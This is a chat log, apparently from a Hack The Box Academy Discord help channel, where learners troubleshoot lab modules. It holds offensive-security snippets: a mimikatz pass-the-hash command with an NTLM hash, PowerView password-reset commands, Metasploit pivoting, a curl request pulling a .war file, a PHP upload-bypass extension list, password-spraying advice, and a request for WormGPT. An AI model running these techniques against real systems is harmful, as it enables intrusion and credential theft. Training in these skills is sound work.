BTW, Should I list only the hosts where I actually gained a foothold or full compromise, and exclude web vulnerabilities that didn’t let me get a foothold?

Hi all,

I am currently stuck on the LLM Output Attacks Skill Assessment. I managed to obtain two sets of keys from Imagebot, but they don’t seem to have much use. None of my injection attempts have worked so far, and most of them are blocked. Additionally, I was able to change my logged-in user role, but still no luck. Any hints? Thanks!

any exploitation

Hey. I am currently stuck. Can I DM you?

@storm elk can I DM you?

Sure

In Active Directory LDAP - Skills Assessment the last question is "What non-default privilege does the htb-student user have?" whoami /priv doesn't return the right answer. Any hints?

In the traditional WPA password attack when i execute sudo airmon-ng start wlan0 it says wlan0 not found i am completely new to this and dont wanna seem dumb

Hello everyone I’m new here

wlan0 would be your wireless adapter, generally speaking. But i'm assuming this is related to the HTB module on wpa attacks? if not then it's not an appropriate question for here

wifi password cracking techniques

@rotund flare welcome, i suggest reading #welcome to see what the server is about and to see how to gain access to chat in #general.

are you ssh/connected to the target machine?

am i meant to do anything else other then to spawn the target and launch the instance

"launch instance" spawns the in-browser vm, that doesn't connect you to the target

so what do i have to do because ive read the first fundamental module but i still dont understand

typically there's instructions at the top of or just above the question that provides instructions on connecting to the target

can you share a link to the module?

yes

https://academy.hackthebox.com/module/312/section/3719

just as i thought

there's instructions to rdp to the target just above the question

(there will be the ip between the words "to" and "with")

so what do i do with that

... you RDP to the spawned IP with the username "wifi" and the password "wifi"

the pwnbox should have xfreerdp installed

I think they just wanted to jump into the Wifi Pentesting module straight away

yeah, lots of basics missing

RDP [remote desktop protocol] is a remote protocol to connect to machines, generally supplying a GUI to work from

hm? where do you think i should learn the basics

well for one the Information Security Foundations Skill path teaches a lot of the basics

i appreciate

you kinda just leaped forward a bit

i think best is to choose a path

not saying you wouldn't be able to complete it, but you're just gonna have 10x the struggle

there's also a BUNCH of more basic wireless pentesting modules

The name sounded more friendly.

'Wifi Password Cracking'

rather than 'Wifi Pentesting Techniques'

marciee android pen testing path is tier 2 content?

¯_(ツ)_/¯

haven't looked, nor cared to look, at it

1 tier 0, 5 tier 3

ohh ohkk

i also just checked..so my student subs willnot cover that

nop

but it was fun

well thanks im gonna pick the path i just didnt see

You liked the name didn't you.

because you wanted to learn how to hack your neighbors wi-fi

no?

😂

it's a joke

💔

i didn't see what else was available with the student membership

he would have watching youtube vidoes right now if he wanted to hack neighbours wifi lmao

clicked on the first thing i saw

more than enough

just take a path

With my 3gb upload and download i dont think id want their 100mbps

clicking on the first thing you see? Boy do i have a definitely not sketchy link for you

lmao

3gb is insane

london

isnt it useless?

3Gb?

well if u can have it why not and its not entirely useless

anyway this is straying off-topic

the top of the list @keen canopy is generally gonna be the "latest" module

why you have 3gb connection..do you distribute internet to neighbours?😂

okay

nah dont like my neighbours

i am sitting here with 100 mbps connection

ANYWAY TO REIGN IN FROM OFF-TOPIC COUGH COUGH

#general

if you wanna continue the conversation in another channel, @keen canopy you'll need to link your hackthebox account to the discord via the instructions in #welcome

TAKE COUGH SYRUP

or you can dm me

yeah i am rn

guys, I'm currently practicing user management and permissions in the linux fundamentals module, and I have a weird issue in my VM. so I created two users dr_luna_cosmos and morgan_nebula, I created a folder telescopes and inside it, user morgan_nebula added a file telescope1_maintenance_log.txt
Now, I'm logged in as dr_luna_cosmos through su command and I can't edit that file, I keep getting "Permission denied" error in nano. But all of the permissions look right, that user should be allowed to save this file... What is happening?

Need help with the VPN. I built a new Kali box and when connecting to the VPN I loose connection via SSH/RDP

does anyone know if HTB uses the IP range 192.168.10.0/24?

appears so, I may need to reip my entire homelab 🙁

Why can't I text on general?

Yes

Yo guys. Real quick question. Basically my school doesn't have an IT department and since I'm the only one in my school who knows a little bit about computers they asked me to "control" the WiFi and make sure no one uses it for bad things.
I was looking for an easy app or something like that so I could control the WiFi remotely from my android. Any recommendations?

Not the right channel, please follow the instructions in #welcome to gain access to a more appropriate channel. I doubt anyone can help you with this, sounds fishy too.

@normal vigil This isn't the server for that type of discussion.

PLS HELP ME, Hello, I think I found the answer to the first question in the “Antak Webshell” section of the Shells & Payloads module, but it's not accepting it. I've tried all possible patterns, but it's not working. Could you please help me?

I'm doing the File Transfers module and maybe I missed it, but why would somebody prefer cat foo.bin | base64 -w 0 rather than base64 -w 0 foo.bin ?

No reason, I'd prefer the latter myself, but I guess the command in the text is more clear about what it does.

That makes sense in context as the author does break down what the components do.

im solving **Using the Metasploit Framework **

the question is

Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.

i got the shell but

(Meterpreter 2)(unknown) > whoami
[-] Unknown command: whoami. Run the help command for more details.
(Meterpreter 2)(unknown) > dir
[-] The "dir" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
(Meterpreter 2)(unknown) > 

please help

Enter “shell”

i did but still

i did that but its says stdapi something

(Meterpreter 1)(unknown) > shell
[-] The "shell" command requires the "stdapi" extension to be loaded (run: `load stdapi`)

(Meterpreter 1)(unknown) > load stdapi
Loading extension stdapi...
[-] Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi
Did you mean?  STDIN
(Meterpreter 1)(unknown) > shell
[-] The "shell" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
(Meterpreter 1)(unknown) > 

wht

@velvet geyser either or, depending on your skillset, you may find it better to do boxes first. most boxes ive done didnt require much in terms of using socks

can i get some help on password attacks for the assessment. i need a hint as to what i may or may not be doing right

https://academy.hackthebox.com/module/315/section/3771
please could someone help me for this. i always get this

curl -X POST http://127.0.0.1:8081/workflows\?url\=http://127.0.0.1:8000/pwn9.war
{
"code": 500,
"type": "InvalidWorkflowException",
"message": "Failed to parse yaml."
}

i follow all instructions but, nothing💔 I've literally finished all the module except this part. I can't take it anymore.

this is Model Deployment Tampering of the Attacking AI - Application and System module in the AI red teamer path

please help me

You need to follow the instructions in #welcome to get access to other channels.

apt list | head and you'll get your answer

i dont think i see it honestly

there's an extra line being counted somewhere 😉 look carefully

also try not to spoil/reveal answers @cunning fern

oh sorry i couldve used || || right

no

spoiler tags really don't do shit as anyone can click on them

doesnt spoiler tag rly talk for itself

that's not really the point i'm making lol. Doesn't take from the fact that anyone can still click on it and reveal the answer. This is a server with aspiring hackers, human curiosity is the biggest thing here

ok i understand now lol thats interesting

ok i understand it all now thanks for the nod

I want a link to enter WormGPT, please and thank you

You really don't need any hint

on any of the ai prompt injection defense modules, you can set your system prompt so that the "key" equals a slur, than the key wont be given out at all since the censoring system works so well lol

Read #welcome to verify, then #rules

thats how i passed all 3 haha

Format:/path/to/antakwebshell

Anyone give me a hint on Windows Lateral Movement > WinRM > Question 3? I can't seem to get around the double hop problem to get to DC01 as Leonvqz despite performing PTT on SRV02

How many firewall rules are enabled? in pentest in a nut shell module

Hi Guys, I'm preparing for OSCP but before buying the course I'm planning to study HTB Academy Penetration Tester Job path role. Can anyone suggest me what are the modules should I study in HTB Academy which will be helpful in the OSCP exam?
Thank you!

Wouldn't that require knowing what's on the exam?

hey everone i had a quick question im not sure if i should ask in plain text or with log to avoid spoiling anything? its like the first step tho so i dont think it will be an issue , so my question is when trying to ssh even myself i get denied (publickey) and cannot figure out how to have it make me a private set 😭, im using a virtualmachine of parrot

Send a picture

okieee one secc

this is the original attempt and can scroll down a bit too if you need lmk

Use the target IP not 127.0.0.1 😄

i thought the target was the password, that makes alot more sense tho

igy gangy ty

Hey everyone, struggling on the Password Attacks skills assessment.

I found creds for hw on the JUMP01 box and the creds indicate I should be able to get into the FILE01 box with the creds. However I’m unable to RDP into file01 with the creds

Anbody open to giving me a few pointers?

Have you run ligolo?

When will DNS use TCP instead of UDP?

"When the connection with UDP fails, typically when the packet size is too large to push through in a single UDP packet"

can the packets just be split up?

Hello! Someone in Skills Assessment of Attacking AI?

It uses both

Hi all, I've been doing the 'ACL Abuse Tactics' section of the Active Directory Enumeration & Attacks module. I got stuck on the part where we change the user damundsen's password by following the examples. Set-DomainUserPassword cannot find the user at all, even though
functions such as Get-DomainUser and net user are able to find the user's info. I've tried using both the SID and DN instead for the -Identity arg but they also dont work.

The commands I used so far:

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

how many modules have you done?

Check if you have the correct password for wley

i have the correct password but still unable to find

I was able to replicate your error by using a wrong password for wley

even with the correct password for wley which i got from the previous sections, i'm still unable to change damundsen's pwd

After correcting the password, the output should look like this

If you are certain you have used the correct password, consider resetting the entire lab environment

If you are still stuck you can DM me

Rest assured, I've tried all the patterns.

If I send you my answer, will you check if it's right or wrong?

You can dm me if you want

Hey guys, I need help:
Module: Password Attacks
Section: Skills Assessment

Problem: I was able to login to jbetty and searched around until I found some credentials for the user for FILE01 ssh. The problem is that I'm trying to ssh to file01 using that user but it just gives me a blank line without asking for the password. I tried all methods looking for other credentials but wasn't able to find anything, am I just going completely wrong? I saw a walkthrough online that said to use proxychains for enumerating then pivoting but this wasn't mentioned at all in the modules (only in the pass the ticket from linux section), when I tried following that method I had so many errors saying that the channel couldn't open so I'm not sure its the right method.

Any advice?

does anyone have this issue when doing the icmp tunneling with SOCKS , in the ubuntu server, when you try to run "" sudo ./ptunnel-ng -r10.129.202.64 -R22 """

And you got the error regarding libcrypto so 3? How to resolve? i was using the sandbox environment that they gave.

iirc, you should think of a GUI service on FILE01

Moin, quick question regarding the Skill assessment for Pivoting and Tunneling.

I'm using my own Kali VM with the VPN profile (tried both TCP and UDP).

So I know what I'm supposed to do but I'm hitting the part where I need to do the pivot and I cannot seem to grasp how I can make proxychains/port-forwarding work.

So if I do ssh -D 9050 ... and run proxychains nmap <IP> --top 25 -sT -v -Pn all ports show as filtered.

I then tried to use metasploit and I have this setup:

msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
[*] Running module against inlanefreight.local (10.129.66.195)
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.0.0/255.255.0.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > sessions 1
[*] Starting interaction with 1...

meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.0.0         255.255.0.0        Session 1
   172.16.5.0         255.255.255.0      Session 1

meterpreter >

but I hit the same "filtered" wall. am I missing something or is this a HTB VPN + proxychain quirk?

I ran into this problem before in the pwnbox but couldn't figure it out. Parrot VM worked just fine tho

All I can say for certain is the problem isn't on the ssh target

using pwnbox is just ignoring the symptoms. when taking CPTS later I dont want to run into these issues and wasting time. I'd rather understand how to make it work :/

Pwnbox has this problem

My own Parrot VM doesn't

oh wait what..? I misunderstood.. I'm not even using Pwnbox tho. I'm using a local KaliVM..

But I haven't had the time to revisit this issue yet.

Most likely it's some settings/version issue... I guess, lol

Instead of ssh -D 9050 ... and meterpreter I also tried sshuttle -vv -r webadmin@10.129.66.195 172.16.5.0/24 --ssh-cmd "ssh -i id_rsa" but then running nmap or similar reports ALL ports as open instead of filtered.

this SA drives me nuts

Try using sudo with the proxychains nmap command, e.g., sudo proxychains nmap....

Pretty sure I've tried that before. But if I haven't, I'm dumb

oh ffs if thats the solution I just retire and become a goat farmer

I'll be your retire buddy

sudo proxychains ... seems to be the solution

I am doing Skills Assessment - Password Attacks
after initial access, i rdp into jump01 with the creds found and I am stuck here, any hints please?

I can confirm it works on the pwnbox as well. Somehow last time I tried everything BUT sudo. I feel dumb.

No sudo needed on my Parrot VM. The problem could be version specific.

O

Without spoiling it too much, you can find a hint on the desktop right after you successfully RDP into JUMP01.

I was mistaking, the rdp is to jump01 not file01
is it the same?

info

My bad. I meant JUMP01 as well. Did this a couple of weeks ago, so my memory of it is a bit fuzzy. Just look at the desktop, there should be something of interest.

can i dm you?

Sorry I can't I'm in the middle of something rn

np

Just use Ligolo-ng.
It really is the best tool for pivoting imo.

agreed, I did initially but the initial foothold webshell made me lose the channel all the time so I wanted to try other techniques

Hi folks, can anyone give me nudge for Password attack skill assessment?
I got the creds of hw and I can do rdp to JUMP01 as well as found shares using nxc on FILE01

hi all

FILE UPLOAD ATTACKS - Type Filters --- anyone has done this module

just for the sake of learning did the double-pivot with ligolo-ng again. its def a good option

spray every creds you get

and check what you can do with that

if you want more help you can dm me

Why can't I talk in general?

Is anyone free to assist with the pass the certificate part of password attacks module? Stuck on the administrator part, able to get the certificate but unable to do anything with it as it says invalid password or PKC12 data

Read and follow #welcome

what is the reason of this error ?

mimikatz(commandline) # sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe
user : julio
domain : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM : 64f12cddaa88057e06a81b54e73b949b
| PID 7720
| TID 7724
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

mimikatz(commandline) # exit
Bye!

Attacking common web applications- Splunk section. Target machines have no connectable endpoints but show ports open. Been this way a week. Any info appreciated Edit: prtg connects but splunk web server no go. Ports show open as in the walkthrough only prtg is connectable

Which port is shown as opened?

How do I even connect?

https://academy.hackthebox.com/module/33/section/183

This is the module

--skip-ssl ?

Oh! I tried --skip_ssl my bad! Thank you

you should have a similar nmap to mine

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8000/tcp open  ssl/http      Splunkd httpd
8080/tcp open  http          Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
8089/tcp open  ssl/http      Splunkd httpd
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

connect with https://IPhere:port instead of http too.. probs that

yesterday the host 172.16.5.5 wasn't up and I spent 2 hours trying to solve the question
thinking i'm missing something
but no ,today I ran nmap again and voila it's up
question solved 5 minutes

i never thought of restarting the machine, will this happen to me when I start the exam?
I need advice for the exam

I just spawned the splunk instance, https:// is only way to get access via browser.

Thank you

Did anyone manage to get a reverse shell off PRTG outfile.ps1 executable method ? I can't seem to get anything back to my netcat listener. Attacking Common Applications - PRTG Network Monitor

Yes. Did you run a test notification to trigger the shell?

I have yeah got the "EXE notification queued up" message no errors

tried two different pshell oneliners now, maybe i need a different list of payloads then if you got it to work!

Could be

ty tho... i can keep digging now

Hello ! Can someone give me a little tips for this question in the Footprinting module in the SNMP section: " Enumerate the custom script that is running on the system and submit its output as the answer." ? Thanks 🙂

enumerate using snmpwalk.

The resources tab on Reporting module has Sample Report.zip, but I can't seem to unzip it, "The archive entry was compressed using an unsupported
compression method."

any ideas? windows errors out and linux says I require a PW for the file

For lfi skill assessment. I did exactly as I saw in walkthrough but doesn't seem to work when I inject she'll I get internal server error

Android Application Malware Analysis.
Unraveling Embedded Custom VM. I followed steps-by-steps. But I can't get a flag.
Here is what I did:
Installed pedometer.apk on the Android emulator.
Launched the app and granted the Physical Activity permission.
Set the emulator to Charging mode.
Enabled Airplane Mode when the step counter showed 12, 13, or 14.
Switched Charging → Not Charging in the emulator battery settings.
Increased the step counter until it reached 86 steps

I can't find what i did wrong..

hii guy i am stuck at file uplaods modules...anyone willing to help?

From the Linux Fundamental course i am unable to get the correct answer the question is what is the name of the network interface that MTU is set to 1500?

Can any one help me

@frigid python use ifconfig

Advanced deserialization attacks - Example 1

the PresentationFramework is not there, when I click show potential solutions

any hints ?

Hello people, login brute forcing module, login forms. I have modified hydra to match the pattern, but it stops at 16 results out of 3400 and doesn't go anywhere for more than 10 minutes

I had to post here to figure it out, haha, it has to be imported from the 7 dotnet shared folder

Quick question on Inveigh - trying to use it for AD Skills Assessment PT 2 -- I can't get SMB Capture to switch to enabled. Any idea how I do this?

I'm doing AD Skills Assessment II and I couldn't find the credentials for "Use a common method to obtain weak credentials for another user" so I looked it up and all the write ups say "just password spray for password X" now I'm wondering how was I supposed to know that

Welp, thanks for the nudge lol

There's like 3000 users, password spraying just one password takes like 20 minutes

So was I supposed to spend hours on this? I don't get it, the password policy doesn't help at all in guessing this

Which section and which question

For the future, I wouldn't spoil something like that. I'm actively working on this assessment and module, and that just kind of gave away what I'm supposed to do

should i dm you the further details?

No, you can send it here

https://academy.hackthebox.com/module/136/section/1288

i am trying .pHp it got uploaded successfully

but my code is not executing

@opal shuttle

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

For example, this list

thanks man i will try bruteforcing with this list

i tried but same issue

my code is not being executed

What PHP code did you write?

i tried both hello word and webshell

nothing works

Did you visit the correct URL path?

yeah i am not getting file not found error

its just blank i am not getting anything in output

@quiet heart bro i am about to shutdown my pc and pls help me to figure that out?

I tried now with one of that extension with simple PHP code and its works, so make sure again to try these extensions
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

Now stuck with unable to load PresentationNative_cor3.dll if anyone knows about the #$%#$ visual studio please give me ahint

Guyss any red team?

i have tried all...can i dm should i have something which i cant discuss here

#red-team

can anyone help with password attack assessment? im stuck on a point and need a nudge

Whatcha got @median kettle

@grizzled schooner so i managed to pivot to the internal host (jump) and found a file i wanna look at, problem is, its an excell spreadsheet, and i am not sure how to view it since the machine doesnt have excel, and i only have terminal access to the dmz

Hmm, I don't remember needing an excel file

it says online passwords, so i figured it would be worth peeking at, ive tried looking at cmdkey /list and windows cred vault. not seeing anything.

i have noticed two applications for password storage, however i am unsure of what to do with them.

What applications are you seeing?

password safe 3 and remoteNG

I will tell you you're staring at the answer then. Look more in to those applications, what they require, what files you have and haven't searched for

check ty

Gotchu

Oh I'm pissed - when using kerbrute to make a userlist - I outputted to a text file - but it includes timestamps, domain, date, whether or not the username is valid or not... Is there a way to get rid of that?

if it's a formatted text file, you can always use something like awk to select only the columns you want

ty

hello can anyone help? i am doing cbbh using proxies module and can i ask question here?

you can use the awk command in linux, just use the $ to speecify the column you want to keep and cat it to a new file

hello guys, I am in File Upload Attack module, which i am doing blacklist filter, it is asking my to upload a file which is not in blacklist, i did upload, but when i visit uploaded file, it just reading back the content of the code, how can i make it work?

• 1 Try using request repeating to be able to quickly test commands. With that, try looking for the other flag.
  doing the ping burp suite and i do this command ip=1; find /* -name *.txt it found 2 flag.txt but they are the same i already found 1 and i need to find the second one also flag.txt

🤚 Looking for a long-term U.S. partner — great rewards await. D!!!M if interested!

for what?

where are u?

doesn't matter

Not the place for this

help me understand the error please

I'm going through the module https://academy.hackthebox.com/module/255/section/2911 (Live\Ghost SPN-Jacking)

I'm specifically performing a Live SPN-Jacking attack. I deleted the SPN from one of the hosts, assigned this SPN to the target host. Then I requested a ticket and changed its SPN, everything as shown in the Module. There were no authorization errors when receiving a ticket and no errors when changing the SPN in this ticket. But when trying to connect via WinRM, an error occurs, the ticket is deleted

What am I doing wrong?

did anyone face a issue where using ligolo-ng crashes the domain controller in the AEN module for the double pivot?

I've been password spraying for the last 1.5 hours... can anyone help me out for Q4 on AD Enumeration and Attacks | Skills Assessment Pt2 please @ with replies

the problem solved itself)

you are doing correct thing, just keep doing it on domain users and maybe try simple password not rockyou

academy modules give you an example of simple/common password

I'm using that pw lol

I've been going for probably the last hour and 45 mins now - although I'm running it against jsmith, because that's all I had that made sense

if I remember it correctly I used user account to dump users with ldap and then used common credentials to password spray

No user I have can dump anything... but I'll look again I guess

You might be missing something. As I remember the password spraying part took me only a couple of minutes tops.

Wouldn't shock me - I'm not cut out for this, but spent enough money figured might as well finish out the modules lol

How to get retired htb boxes's writeups in pdf format

Partner up with me 😀 in the U.S. — long-term, rewarding, and worth it. Message me!

You need a subscription

Why are you using jsmith when you can just dump all users with one of the credentials I assume you already have? hmmm...

Both I tried didn't work unless my lab has been broken for 2 hours lol

Dude, not the place - take it elsewhere

Usually you never have to bruteforce for more then 10 mins tops not even talking about an hour in any module

<@&861185840277487616>

That's what I thought... I've been getting frustrated, but I got nothing

You got it just try using ldap since you are on Q4 you already have what you need to enumerate domain users

I tried ntds, lsa, sam and lsass -- got errors on all 3 for perms

also tried --loggedon-users with nxc got nothing

maybe try users flag on nxc

...goddamnit

Maybe the user you need isn't logged on?

Sometimes I love you guys, other times I hate you lmfao - I had to restart my lab sesh anyway, will give that a try

Yeah hackthebox always makes us scratch our heads dd

Would you rather just have us tell you the solution lol

lmfao

Pentester path was one of the best courses I have done in a while honestly

The AD skills assessment is one of the best designed skill assessments I've done so far

<@&861185840277487616> can we get this dude to stop? Like the 4th time they've mentioned this

@dawn current please read #rules

How's that dude not getting banned

hi for the Kerberoasting - from Windows section of AD Enumeration and Attacks, I am having trouble with the second question. So the program they tell me to use has a syntax error. Its written in Python. I would use Python2.7 like they are telling me but I have Python3 version of it installed. But when I run the program (kirbi2john) there's an syntax error. This is the same program they are telling me to use. It should work ideally. This is the program that converts the other file I generated from other output into a format that can be cracked by password cracking program.

so the Python script built into Kali won't run

can someone help me with this?

I can't get more specific without spoiling it

Traceback (most recent call last):
  File "/usr/bin/kirbi2john", line 50, in <module>
    if et:
       ^^
NameError: name 'et' is not defined. Did you mean: 'set'?```

I already did

I tried running kirbi2john in python2.7 and got this:

└─$ python2.7 /usr/bin/kirbi2john crack_this.kirbi 
Traceback (most recent call last):
  File "/usr/bin/kirbi2john", line 22, in <module>
    from pyasn1.codec.ber import decoder
ImportError: No module named pyasn1.codec.ber

@frigid python ip link show (interface name here)

I didn't have issues with this when I did the assessment, but have you tried installing kirbi2john in a virtual environment? If there is an issue with the Kali version, it might help to get a fresh copy of it

this is in a kali VM. your saying to make a VM inside a VM?

I mean a Python venv

ok fair

but its not the assessment

its question 2 of kerberoasting from windows section of AD enumeration and attacks

so about half way through the module

is where this section is

I completed question 1 this is in order to answer question 2

@heavy mango can I DM you later maybe you can help me with this one on one? I'm scared if I get too specific I'll spoil the information which I have already been yelled at on here for.

Yeah, no worries. I'll be around for couple of hours

ok cool talk to you then

I’m stuck in Bash Scripting (Easy) is this the chat to discuss code and questions?

@languid fjord I have sent a DM to you, kindly have a look at it.

Password Attacks
Module Pass the Certificate
What are the contents of flag.txt on Administrator's desktop?

hey I have a problem in the file upload module whitelist flag , I got the flag but it didnt works

Content above Tier 0 modules can't be given away... You can receive a nudge or help to get the answer though

Hey mate -- tried one pw, that didn't work... haven't spent 40 mins with nxc being slow on another... what am I missing?

Now nxc and CME just time-out when attempting to do anything lol

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

For those interested, running the same script on Mac produces a different number than on Linux. It’s something to do with the type of encoding between the two systems. Linux wraps, so it causes extra characters, which the answer is looking for.

I'm currently doing the AEN section but I'm not able to get bloodhound data using bloodhound-python or bloodhound-ce. I've never had issues with these commands up until now. The module uses Sharphound to collect the data but I prefer to use the former methods. Can anyone confirm if they are experiencing the same thing?

hey was doing the "Android Application Static Analysis " module, got to the part of "Reversing Hybrid Apps" where i now compllty stuck on the first question where we need to analyze "myapp_hybrid1.apk" some one also doing this/ or did this already?

try using linux commands to search

Does anyone have a second to help me with https://academy.hackthebox.com/module/109/section/1038
"Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found. "

I've confirmed with my notes and reset the target machine. Can't get the command to run at all no matter what I do. Tried Linux only as well as Linux and Windows command bypass characters.

Did you find the flag in the previous section?

Yup, you need it for this one to cat the home directory

okay, try using some other possibly blacklisted bypasses from that section and the preivous section

Not sure what else to try. I've tried all of the other bypass options

if you were able to get the directory from the previous section, try using a bypass again. I'll give you a hint, you've probably already used one. The other is in that section's reading

if you're still stuck you can pm me

https://x.com/silentstrikelab/status/1967710953807745085?s=46&t=7t1v0gBUUZ-tPc3HKpZkPQ

I'm doing the pillaging section in windows
I have the cookie and admin priv. Whenever I enter Grace's cookie in the site nothing happens to the page.

Firefox also after a certain amount of time detects the cookie plugin and disables it

Guys what do I put as my proxy address for my ubuntu server?

Yes we discussed

Hello

Is anyone available to ?

Talk

hello can i get a help on the nosql skill assessement 2 ? || i know that the username is passive of injection because when i modify the javascript the this.username for this.any the application respond with a 500 ||

Just ask your module related question here.

How can i bypass the last section

No one knows what you're working on. Always best to say the module, section, and question you're on. What you've tried, etc. Remember to take care not to reveal content from modules above tier 0.

Hi I have completed section "Credential Hunting in Windows" from "Password Attacks" but I have few questions I didn't search anywhere directly dumping them here

1. Why did LaZagne's cmd window closes automatically when task is completed??
2. And if I didn't use findstr and manually did searching and also findstr didn't give all the files that are useful
3. What is the right way to do the lab??

You can DM me

its for https://academy.hackthebox.com/module/143/section/1508
could someone please give me a bit of assistance as im a bit confused why a password isnt working for this
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

as for the command the password in the section but not the 1 above
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240

am I meant to break the password from the impacket lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 ?
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)

I too have that same question, dont have enough knowledge to provide help

@heady sapphire don't reveal answers

sometimes a tool can miss something

that's why it's important to know multiple methods to gather information

is this for me?

considering you said you had the same question 😉

when I go back for a second round of the pathway going to read re the note I left from this convo

so there is no route to the host... something wrong with the VM module?

└──╼ $impacket-lookupsid logistics.inlanefreight.local/htb-student_adm@172.16.5.5
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
[] Brute forcing SIDs at 172.16.5.5
[] StringBinding ncacn_np:172.16.5.5[\pipe\lsarpc]
[-] [Errno Connection error (172.16.5.5:445)] [Errno 113] No route to host

ok so it was wrong with the HTB VM...
└──╼ $ping 172.16.5.5
PING 172.16.5.5 (172.16.5.5) 56(84) bytes of data.
64 bytes from 172.16.5.5: icmp_seq=1 ttl=128 time=2.95 ms
64 bytes from 172.16.5.5: icmp_seq=2 ttl=128 time=0.513 ms
^C
--- 172.16.5.5 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.513/1.733/2.954/1.220 ms

In AEN module, I exploited SysaxAutomation and added the ilfserveradm user to the local administrators group. But I still cannot access the administrator flag. Any help?

hi guys , for password attacks skill assessment. https://academy.hackthebox.com/module/147/section/1356 i need to get the proxychains going ,
i have used ssh -D 9050 user@<DMZ01> command and have it running it a different pane
reinstalled proxychains and have socks4 127.0.0.1 9050 under the [ProxyList]
but it somehow isnt working, my most basic nmap scans with proxychains are giving no results

i think with proxychains and nmap you got to use -sL

my brain is super fried doing AD module